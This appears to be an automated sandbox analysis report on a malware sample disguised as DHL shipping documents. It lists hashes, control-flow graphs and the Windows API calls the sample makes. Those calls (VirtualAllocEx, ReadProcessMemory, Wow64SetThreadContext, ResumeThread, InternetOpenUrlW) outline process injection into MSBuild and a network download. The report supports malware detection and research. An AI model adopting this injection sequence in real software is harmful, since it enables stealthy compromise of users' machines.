                                                          • Opcode ID: 5c3a11b82855f99f8f33f7493429f7dbb4e7fd19f4934dff502e3c9b8e475fc9
                                                          • Instruction ID: 0faa714a7cdfe973387ca118398d09cf9fed26710f6022f395566269b36d5782
                                                          • Opcode Fuzzy Hash: 5c3a11b82855f99f8f33f7493429f7dbb4e7fd19f4934dff502e3c9b8e475fc9
                                                          • Instruction Fuzzy Hash: C9710270908A1D8FDBA8DF58C859BE9BBF1FB69311F1041AED00EE3651DB75A981CB40
                                                          Function 00007FF886E32052 Relevance: 1.7, APIs: 1, Instructions: 238networkCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 215 7ff886e32052-7ff886e32d82 219 7ff886e32d9e-7ff886e32dae 215->219 220 7ff886e32d84-7ff886e32d9b 215->220 221 7ff886e32dca-7ff886e32e76 InternetOpenUrlW 219->221 222 7ff886e32db0-7ff886e32dc7 219->222 220->219 223 7ff886e32e78 221->223 224 7ff886e32e7e-7ff886e32ef8 221->224 222->221 223->224
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1419677123.00007FF886E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_7ff886e30000_DHL Shipping Documents 0016229753_PDF.jbxd
                                                          Similarity
                                                          • API ID: InternetOpen
                                                          • String ID:
                                                          • API String ID: 2038078732-0
                                                          • Opcode ID: 1fa24fe874f6de09d862753502bd4e0629e95a1338ce39f2f4297b3ba4011ca2
                                                          • Instruction ID: 744a8d0469026cc225ee63c4cfba5512858eb9e33daf488b40f7d9d5e90e728c
                                                          • Opcode Fuzzy Hash: 1fa24fe874f6de09d862753502bd4e0629e95a1338ce39f2f4297b3ba4011ca2
                                                          • Instruction Fuzzy Hash: C371F170908A1D8FDB98EF58C885BE9BBF1FB69301F1041AED04EE3651DB75A980CB41
                                                          Function 00007FF886E388D5 Relevance: 1.7, APIs: 1, Instructions: 199memoryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 227 7ff886e388d5-7ff886e388e1 228 7ff886e388ec-7ff886e38a29 VirtualAllocEx 227->228 229 7ff886e388e3-7ff886e388eb 227->229 234 7ff886e38a2b 228->234 235 7ff886e38a31-7ff886e38a9d 228->235 229->228 234->235
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1419677123.00007FF886E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_7ff886e30000_DHL Shipping Documents 0016229753_PDF.jbxd
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID:
                                                          • API String ID: 4275171209-0
                                                          • Opcode ID: 0c53dc2a6e8838ebabd16f95995215d34d1bb8f9644ecea323af3b3d2fccab68
                                                          • Instruction ID: 515d37357d38044632a05f34dc652699df74738736f189be69c912f7560d0cb2
                                                          • Opcode Fuzzy Hash: 0c53dc2a6e8838ebabd16f95995215d34d1bb8f9644ecea323af3b3d2fccab68
                                                          • Instruction Fuzzy Hash: 42511870918A5D8FDF94EF58C885BE9BBF1FB69310F1041AAD04DE3252CB35A985CB41
                                                          Function 00007FF886E32F19 Relevance: 1.7, APIs: 1, Instructions: 198filenetworkCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 248 7ff886e32f19-7ff886e32fc5 252 7ff886e32fee-7ff886e3307b InternetReadFile 248->252 253 7ff886e32fc7-7ff886e32feb 248->253 254 7ff886e3307d 252->254 255 7ff886e33083-7ff886e330e3 252->255 253->252 254->255
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1419677123.00007FF886E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_7ff886e30000_DHL Shipping Documents 0016229753_PDF.jbxd
                                                          Similarity
                                                          • API ID: FileInternetRead
                                                          • String ID:
                                                          • API String ID: 778332206-0
                                                          • Opcode ID: 7a6c4acd0933b0d72c727b0b98637d7524406403c72ed9513665680c9d4cad9f
                                                          • Instruction ID: 0e85eff8113979efe9809ea30eb3ad0a299822b4679380980ce32d39110e4609
                                                          • Opcode Fuzzy Hash: 7a6c4acd0933b0d72c727b0b98637d7524406403c72ed9513665680c9d4cad9f
                                                          • Instruction Fuzzy Hash: 33511870D18A1C8FDB58DF98C885BE9BBF0FB69311F1041AED049A3251DB70A985CF81
                                                          Function 00007FF886E390AD Relevance: 1.7, APIs: 1, Instructions: 191COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 258 7ff886e390ad-7ff886e390b9 259 7ff886e390bb-7ff886e390c3 258->259 260 7ff886e390c4-7ff886e391ff ReadProcessMemory 258->260 259->260 265 7ff886e39201 260->265 266 7ff886e39207-7ff886e39269 260->266 265->266
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1419677123.00007FF886E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_7ff886e30000_DHL Shipping Documents 0016229753_PDF.jbxd
                                                          Similarity
                                                          • API ID: MemoryProcessRead
                                                          • String ID:
                                                          • API String ID: 1726664587-0
                                                          • Opcode ID: bbc4937860954990c525a2febaf468d8a488f00bef0c539f9616806b52b2a640
                                                          • Instruction ID: 0d015f990c7cae209960e63895d580bd0629134656acfb6d6c8d61282233870a
                                                          • Opcode Fuzzy Hash: bbc4937860954990c525a2febaf468d8a488f00bef0c539f9616806b52b2a640
                                                          • Instruction Fuzzy Hash: C2511630D08A5D8FDB94DF58C884BE9BBB1FB69311F1081AAD44DE7252DB74A985CF40
                                                          Function 00007FF886E385DE Relevance: 1.7, APIs: 1, Instructions: 185threadCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 269 7ff886e385de-7ff886e385eb 270 7ff886e385ed-7ff886e385f5 269->270 271 7ff886e385f6-7ff886e386b2 269->271 270->271 275 7ff886e386d4-7ff886e38736 Wow64SetThreadContext 271->275 276 7ff886e386b4-7ff886e386d1 271->276 278 7ff886e38738 275->278 279 7ff886e3873e-7ff886e38794 275->279 276->275 278->279
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1419677123.00007FF886E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_7ff886e30000_DHL Shipping Documents 0016229753_PDF.jbxd
                                                          Similarity
                                                          • API ID: ContextThreadWow64
                                                          • String ID:
                                                          • API String ID: 983334009-0
                                                          • Opcode ID: a9df595fb75ca2ac86144fd6cd36ce63fe0d4b677187b636fdfd12b27e594303
                                                          • Instruction ID: ea30209e5f3e032b1fd95b67f0ccd5c502fa35a065c6c06db5811cda7cd2792f
                                                          • Opcode Fuzzy Hash: a9df595fb75ca2ac86144fd6cd36ce63fe0d4b677187b636fdfd12b27e594303
                                                          • Instruction Fuzzy Hash: 74516A30D0864D8FEB55DFA8C849BEDBBF1FB65311F1482AAD048E7256CB789885CB40
                                                          Function 00007FF886E38799 Relevance: 1.6, APIs: 1, Instructions: 134threadCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 282 7ff886e38799-7ff886e387a5 283 7ff886e387b0-7ff886e38880 ResumeThread 282->283 284 7ff886e387a7-7ff886e387af 282->284 288 7ff886e38888-7ff886e388d2 283->288 289 7ff886e38882 283->289 284->283 289->288
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1419677123.00007FF886E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_7ff886e30000_DHL Shipping Documents 0016229753_PDF.jbxd
                                                          Similarity
                                                          • API ID: ResumeThread
                                                          • String ID:
                                                          • API String ID: 947044025-0
                                                          • Opcode ID: 65937b55f4b2ccc70ae83f4274b07f3d693dff337334ad3284203c3421a50d67
                                                          • Instruction ID: 09c9e0e3c1a5169fc0d60b12f2c755dc089e4492cab44f57563c1990fcd5c29b
                                                          • Opcode Fuzzy Hash: 65937b55f4b2ccc70ae83f4274b07f3d693dff337334ad3284203c3421a50d67
                                                          • Instruction Fuzzy Hash: 8D412870D0864D8FDB99DFA8C885AEDBBF0FF56311F10416AD449E7252CA34A885CF41

                                                          Non-executed Functions

                                                          Function 00007FF886E31750 Relevance: .4, Instructions: 391COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1419677123.00007FF886E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_7ff886e30000_DHL Shipping Documents 0016229753_PDF.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0ebae087c31eab7bef7568e571fc790c77dde0a6d7888bc56b5f1bd043558b78
                                                          • Instruction ID: 37605a7e8c30dbc09a6d1c45073989a73f09c268c0ebbe411ecae14efb6ab375
                                                          • Opcode Fuzzy Hash: 0ebae087c31eab7bef7568e571fc790c77dde0a6d7888bc56b5f1bd043558b78
                                                          • Instruction Fuzzy Hash: B9C1C562E1D6D24BE312BBFCB8552E57F90EF523B571841BFC1C88A097DC08684AC396
                                                          Function 00007FF886E30FF2 Relevance: .1, Instructions: 126COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.1419677123.00007FF886E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E30000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_7ff886e30000_DHL Shipping Documents 0016229753_PDF.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3210da59079ad580778973b68ccf6c7948e53a9200be657597748fd3365640ae
                                                          • Instruction ID: da36af7a94a49461b5b41c9b4ce5a0a9e0abbe69ceb011beb4bf164cfba926c8
                                                          • Opcode Fuzzy Hash: 3210da59079ad580778973b68ccf6c7948e53a9200be657597748fd3365640ae
                                                          • Instruction Fuzzy Hash: 4231C077A289364AD7017BFDB8052E9B740DF963B6705867BD1C98E0439E08309BC7D6

                                                          Execution Graph

                                                          Execution Coverage:11.4%
                                                          Dynamic/Decrypted Code Coverage:100%
                                                          Signature Coverage:0%
                                                          Total number of Nodes:17
                                                          Total number of Limit Nodes:4
                                                          execution_graph 25718 1350848 25720 135084e 25718->25720 25719 135091b 25720->25719 25722 1351342 25720->25722 25723 1351356 25722->25723 25724 1351448 25723->25724 25726 1357059 25723->25726 25724->25720 25727 1357063 25726->25727 25728 1357119 25727->25728 25731 60cceb0 25727->25731 25735 60ccec0 25727->25735 25728->25723 25732 60ccec0 25731->25732 25733 60cd0ea 25732->25733 25734 60cd50a GlobalMemoryStatusEx 25732->25734 25733->25728 25734->25732 25736 60cced5 25735->25736 25737 60cd0ea 25736->25737 25738 60cd50a GlobalMemoryStatusEx 25736->25738 25737->25728 25738->25736

                                                          Executed Functions

                                                          Function 01353E48 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 0 1353e48-1353eae 2 1353eb0-1353ebb 0->2 3 1353ef8-1353efa 0->3 2->3 5 1353ebd-1353ec9 2->5 4 1353efc-1353f54 3->4 14 1353f56-1353f61 4->14 15 1353f9e-1353fa0 4->15 6 1353eec-1353ef6 5->6 7 1353ecb-1353ed5 5->7 6->4 9 1353ed7 7->9 10 1353ed9-1353ee8 7->10 9->10 10->10 11 1353eea 10->11 11->6 14->15 17 1353f63-1353f6f 14->17 16 1353fa2-1353fba 15->16 23 1354004-1354006 16->23 24 1353fbc-1353fc7 16->24 18 1353f71-1353f7b 17->18 19 1353f92-1353f9c 17->19 21 1353f7d 18->21 22 1353f7f-1353f8e 18->22 19->16 21->22 22->22 25 1353f90 22->25 27 1354008-1354056 23->27 24->23 26 1353fc9-1353fd5 24->26 25->19 28 1353fd7-1353fe1 26->28 29 1353ff8-1354002 26->29 35 135405c-135406a 27->35 30 1353fe5-1353ff4 28->30 31 1353fe3 28->31 29->27 30->30 33 1353ff6 30->33 31->30 33->29 36 1354073-13540d3 35->36 37 135406c-1354072 35->37 44 13540d5-13540d9 36->44 45 13540e3-13540e7 36->45 37->36 44->45 46 13540db 44->46 47 13540f7-13540fb 45->47 48 13540e9-13540ed 45->48 46->45 50 13540fd-1354101 47->50 51 135410b-135410f 47->51 48->47 49 13540ef-13540f2 call 1350ab8 48->49 49->47 50->51 53 1354103-1354106 call 1350ab8 50->53 54 1354111-1354115 51->54 55 135411f-1354123 51->55 53->51 54->55 56 1354117-135411a call 1350ab8 54->56 57 1354125-1354129 55->57 58 1354133-1354137 55->58 56->55 57->58 61 135412b 57->61 62 1354147 58->62 63 1354139-135413d 58->63 61->58 65 1354148 62->65 63->62 64 135413f 63->64 64->62 65->65
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2591920837.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1350000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: \Vam$dyqJ$dyqJ
                                                          • API String ID: 0-913269209
                                                          • Opcode ID: 9e5fd21fd7e46e59bc0ed7194059e6beeec82e04747d1a2c0d40aca4fb273c8e
                                                          • Instruction ID: e05612795f8ac21e603ac9091470f98cfa3c21c177bce79e92b0c9396311b3a6
                                                          • Opcode Fuzzy Hash: 9e5fd21fd7e46e59bc0ed7194059e6beeec82e04747d1a2c0d40aca4fb273c8e
                                                          • Instruction Fuzzy Hash: 16918E71E00309DFDB54CFA9C885BDDBBF2BF88758F148129E805A7294EB749985CB81
                                                          Function 01359BC0 Relevance: 2.8, Instructions: 2820COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2591920837.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1350000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 81711a8353b31d59056e10e735c1cf2c1848651ca20c95779361dd7385c57d04
                                                          • Instruction ID: fa31f666c41a295d8cf5d87c7663241f80deb4514a263ebd24b27b9eb800d0f4
                                                          • Opcode Fuzzy Hash: 81711a8353b31d59056e10e735c1cf2c1848651ca20c95779361dd7385c57d04
                                                          • Instruction Fuzzy Hash: 9153F731C10B1A8ADB51EF68C8849A9F7B1FF99300F15D79AE45977121FB70AAC4CB81
                                                          Function 01354A60 Relevance: 2.8, Strings: 2, Instructions: 266COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 829 1354a60-1354ac6 831 1354b10-1354b12 829->831 832 1354ac8-1354ad3 829->832 834 1354b14-1354b2d 831->834 832->831 833 1354ad5-1354ae1 832->833 835 1354b04-1354b0e 833->835 836 1354ae3-1354aed 833->836 841 1354b2f-1354b3b 834->841 842 1354b79-1354b7b 834->842 835->834 837 1354af1-1354b00 836->837 838 1354aef 836->838 837->837 840 1354b02 837->840 838->837 840->835 841->842 844 1354b3d-1354b49 841->844 843 1354b7d-1354b95 842->843 851 1354b97-1354ba2 843->851 852 1354bdf-1354be1 843->852 845 1354b6c-1354b77 844->845 846 1354b4b-1354b55 844->846 845->843 848 1354b57 846->848 849 1354b59-1354b68 846->849 848->849 849->849 850 1354b6a 849->850 850->845 851->852 853 1354ba4-1354bb0 851->853 854 1354be3-1354bfb 852->854 855 1354bd3-1354bdd 853->855 856 1354bb2-1354bbc 853->856 860 1354c45-1354c47 854->860 861 1354bfd-1354c08 854->861 855->854 858 1354bc0-1354bcf 856->858 859 1354bbe 856->859 858->858 862 1354bd1 858->862 859->858 864 1354c49-1354cbc 860->864 861->860 863 1354c0a-1354c16 861->863 862->855 865 1354c39-1354c43 863->865 866 1354c18-1354c22 863->866 873 1354cc2-1354cd0 864->873 865->864 867 1354c24 866->867 868 1354c26-1354c35 866->868 867->868 868->868 870 1354c37 868->870 870->865 874 1354cd2-1354cd8 873->874 875 1354cd9-1354d39 873->875 874->875 882 1354d49-1354d4d 875->882 883 1354d3b-1354d3f 875->883 885 1354d5d-1354d61 882->885 886 1354d4f-1354d53 882->886 883->882 884 1354d41 883->884 884->882 888 1354d71-1354d75 885->888 889 1354d63-1354d67 885->889 886->885 887 1354d55 886->887 887->885 891 1354d85-1354d89 888->891 892 1354d77-1354d7b 888->892 889->888 890 1354d69 889->890 890->888 893 1354d99-1354d9d 891->893 894 1354d8b-1354d8f 891->894 892->891 895 1354d7d 892->895 897 1354dad 893->897 898 1354d9f-1354da3 893->898 894->893 896 1354d91-1354d94 call 1350ab8 894->896 895->891 896->893 902 1354dae 897->902 898->897 900 1354da5-1354da8 call 1350ab8 898->900 900->897 902->902
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2591920837.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1350000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: dyqJ$dyqJ
                                                          • API String ID: 0-3410880094
                                                          • Opcode ID: eab1c742e8918bd1a42d161d59809988b5638307668e3594e4b7af5ddc052aaa
                                                          • Instruction ID: 9d9111d2926cdda6e753b1dad32fa8e984c7fc237c6fad8ba24be7745c78c59e
                                                          • Opcode Fuzzy Hash: eab1c742e8918bd1a42d161d59809988b5638307668e3594e4b7af5ddc052aaa
                                                          • Instruction Fuzzy Hash: 3DB16F70E00209CFDF58CFA9D885B9EBBF2AF88718F148529D855E7354EB749885CB81
                                                          Function 0135CE50 Relevance: 2.3, Instructions: 2322COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2591920837.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1350000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2cc507e4e950f211e37bd725741fb6a6c31414ef4484edd4b76cc407ba8d7b07
                                                          • Instruction ID: 48b60cc7777d230a905854d73f63e241cf5bcf59d8802a841a29a85aa8aea36c
                                                          • Opcode Fuzzy Hash: 2cc507e4e950f211e37bd725741fb6a6c31414ef4484edd4b76cc407ba8d7b07
                                                          • Instruction Fuzzy Hash: 07331E31D1071A8EDB11EF68C894AADF7B1FF99304F15C69AD448B7211EB70AAC5CB81
                                                          Function 01353E3C Relevance: 4.0, Strings: 3, Instructions: 236COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 66 1353e3c-1353eae 69 1353eb0-1353ebb 66->69 70 1353ef8-1353efa 66->70 69->70 72 1353ebd-1353ec9 69->72 71 1353efc-1353f54 70->71 81 1353f56-1353f61 71->81 82 1353f9e-1353fa0 71->82 73 1353eec-1353ef6 72->73 74 1353ecb-1353ed5 72->74 73->71 76 1353ed7 74->76 77 1353ed9-1353ee8 74->77 76->77 77->77 78 1353eea 77->78 78->73 81->82 84 1353f63-1353f6f 81->84 83 1353fa2-1353fba 82->83 90 1354004-1354006 83->90 91 1353fbc-1353fc7 83->91 85 1353f71-1353f7b 84->85 86 1353f92-1353f9c 84->86 88 1353f7d 85->88 89 1353f7f-1353f8e 85->89 86->83 88->89 89->89 92 1353f90 89->92 94 1354008-135401a 90->94 91->90 93 1353fc9-1353fd5 91->93 92->86 95 1353fd7-1353fe1 93->95 96 1353ff8-1354002 93->96 101 1354021-1354056 94->101 97 1353fe5-1353ff4 95->97 98 1353fe3 95->98 96->94 97->97 100 1353ff6 97->100 98->97 100->96 102 135405c-135406a 101->102 103 1354073-13540d3 102->103 104 135406c-1354072 102->104 111 13540d5-13540d9 103->111 112 13540e3-13540e7 103->112 104->103 111->112 113 13540db 111->113 114 13540f7-13540fb 112->114 115 13540e9-13540ed 112->115 113->112 117 13540fd-1354101 114->117 118 135410b-135410f 114->118 115->114 116 13540ef-13540f2 call 1350ab8 115->116 116->114 117->118 120 1354103-1354106 call 1350ab8 117->120 121 1354111-1354115 118->121 122 135411f-1354123 118->122 120->118 121->122 123 1354117-135411a call 1350ab8 121->123 124 1354125-1354129 122->124 125 1354133-1354137 122->125 123->122 124->125 128 135412b 124->128 129 1354147 125->129 130 1354139-135413d 125->130 128->125 132 1354148 129->132 130->129 131 135413f 130->131 131->129 132->132
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2591920837.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1350000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: \Vam$dyqJ$dyqJ
                                                          • API String ID: 0-913269209
                                                          • Opcode ID: d12cb380c15e4cefa4f5ddc6ee5ce4a158dd18f184818384a60607cd4e71f35b
                                                          • Instruction ID: 9be932d53508cdeaed560a43c10760cfec987a46ae91ed8f6eaaed45c1a9302b
                                                          • Opcode Fuzzy Hash: d12cb380c15e4cefa4f5ddc6ee5ce4a158dd18f184818384a60607cd4e71f35b
                                                          • Instruction Fuzzy Hash: A9917E71E00309DFDB54CFA9C885BDDBBF1BF48758F248129E808A7254EB759985CB81
                                                          Function 060CE0C8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 141COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 133 60ce0c8-60ce0e3 134 60ce10d-60ce120 133->134 135 60ce0e5-60ce10c call 60cd4ac 133->135 139 60ce123-60ce125 call 60cd4b8 134->139 141 60ce12a-60ce12c 139->141 142 60ce12e-60ce131 141->142 143 60ce132-60ce170 141->143 143->139 148 60ce172-60ce17c 143->148 148->141 149 60ce17e-60ce191 148->149 151 60ce197-60ce224 GlobalMemoryStatusEx 149->151 152 60ce193-60ce196 149->152 155 60ce22d-60ce255 151->155 156 60ce226-60ce22c 151->156 156->155
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2594848220.00000000060C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_60c0000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: dyqJ
                                                          • API String ID: 0-1846348974
                                                          • Opcode ID: 3f46f326c7e83a7499127b3a7c0f9b1f49b5f3e0e6d85d7f5034b9dd12a17bcd
                                                          • Instruction ID: f50776811d62993997951fcd2f8cec5bb01ca99ed1bedbde97b9ee77adad87ea
                                                          • Opcode Fuzzy Hash: 3f46f326c7e83a7499127b3a7c0f9b1f49b5f3e0e6d85d7f5034b9dd12a17bcd
                                                          • Instruction Fuzzy Hash: A3414272D143958FCB10CFB9D8043EEBFF1AF89220F1586AAD444E7280D7789844CBA0
                                                          Function 060CE1B0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 52COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 159 60ce1b0-60ce1ee 160 60ce1f6-60ce224 GlobalMemoryStatusEx 159->160 161 60ce22d-60ce255 160->161 162 60ce226-60ce22c 160->162 162->161
                                                          APIs
                                                          • GlobalMemoryStatusEx.KERNELBASE ref: 060CE217
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2594848220.00000000060C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_60c0000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID: GlobalMemoryStatus
                                                          • String ID: dyqJ
                                                          • API String ID: 1890195054-1846348974
                                                          • Opcode ID: f31758d47d987ac41e104071a38b3bfde0c93f061e64c83f5625c1cb393a0ae9
                                                          • Instruction ID: 5a3e3a2b11b6328214d1f99e9179d95babd59830e760e5bd315713d7c2f8da00
                                                          • Opcode Fuzzy Hash: f31758d47d987ac41e104071a38b3bfde0c93f061e64c83f5625c1cb393a0ae9
                                                          • Instruction Fuzzy Hash: 6611E2B1C0065A9BDB10CF9AD544BDEFBF4AF48220F15816AD818A7240D378AA54CFA5
                                                          Function 01354A56 Relevance: 2.8, Strings: 2, Instructions: 261COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 903 1354a56-1354ac6 905 1354b10-1354b12 903->905 906 1354ac8-1354ad3 903->906 908 1354b14-1354b2d 905->908 906->905 907 1354ad5-1354ae1 906->907 909 1354b04-1354b0e 907->909 910 1354ae3-1354aed 907->910 915 1354b2f-1354b3b 908->915 916 1354b79-1354b7b 908->916 909->908 911 1354af1-1354b00 910->911 912 1354aef 910->912 911->911 914 1354b02 911->914 912->911 914->909 915->916 918 1354b3d-1354b49 915->918 917 1354b7d-1354b95 916->917 925 1354b97-1354ba2 917->925 926 1354bdf-1354be1 917->926 919 1354b6c-1354b77 918->919 920 1354b4b-1354b55 918->920 919->917 922 1354b57 920->922 923 1354b59-1354b68 920->923 922->923 923->923 924 1354b6a 923->924 924->919 925->926 927 1354ba4-1354bb0 925->927 928 1354be3-1354bfb 926->928 929 1354bd3-1354bdd 927->929 930 1354bb2-1354bbc 927->930 934 1354c45-1354c47 928->934 935 1354bfd-1354c08 928->935 929->928 932 1354bc0-1354bcf 930->932 933 1354bbe 930->933 932->932 936 1354bd1 932->936 933->932 938 1354c49-1354c7f 934->938 935->934 937 1354c0a-1354c16 935->937 936->929 939 1354c39-1354c43 937->939 940 1354c18-1354c22 937->940 946 1354c87-1354cbc 938->946 939->938 941 1354c24 940->941 942 1354c26-1354c35 940->942 941->942 942->942 944 1354c37 942->944 944->939 947 1354cc2-1354cd0 946->947 948 1354cd2-1354cd8 947->948 949 1354cd9-1354d39 947->949 948->949 956 1354d49-1354d4d 949->956 957 1354d3b-1354d3f 949->957 959 1354d5d-1354d61 956->959 960 1354d4f-1354d53 956->960 957->956 958 1354d41 957->958 958->956 962 1354d71-1354d75 959->962 963 1354d63-1354d67 959->963 960->959 961 1354d55 960->961 961->959 965 1354d85-1354d89 962->965 966 1354d77-1354d7b 962->966 963->962 964 1354d69 963->964 964->962 967 1354d99-1354d9d 965->967 968 1354d8b-1354d8f 965->968 966->965 969 1354d7d 966->969 971 1354dad 967->971 972 1354d9f-1354da3 967->972 968->967 970 1354d91-1354d94 call 1350ab8 968->970 969->965 970->967 976 1354dae 971->976 972->971 974 1354da5-1354da8 call 1350ab8 972->974 974->971 976->976
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2591920837.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1350000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: dyqJ$dyqJ
                                                          • API String ID: 0-3410880094
                                                          • Opcode ID: 6cf2f14b6a2a181ba7957e8c4f5b9b8c475ee25a553c3895fc2858b319811d1f
                                                          • Instruction ID: dcf905e07d8ba9017bc2d72b2ba3144de74d534cd43055370c373146533ac0b1
                                                          • Opcode Fuzzy Hash: 6cf2f14b6a2a181ba7957e8c4f5b9b8c475ee25a553c3895fc2858b319811d1f
                                                          • Instruction Fuzzy Hash: 38A16C70E00209CFDF58CFA9D885BDEBBF1AF88B18F148529D855E7254EB749885CB81
                                                          Function 01356CA5 Relevance: 2.6, Strings: 2, Instructions: 134COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
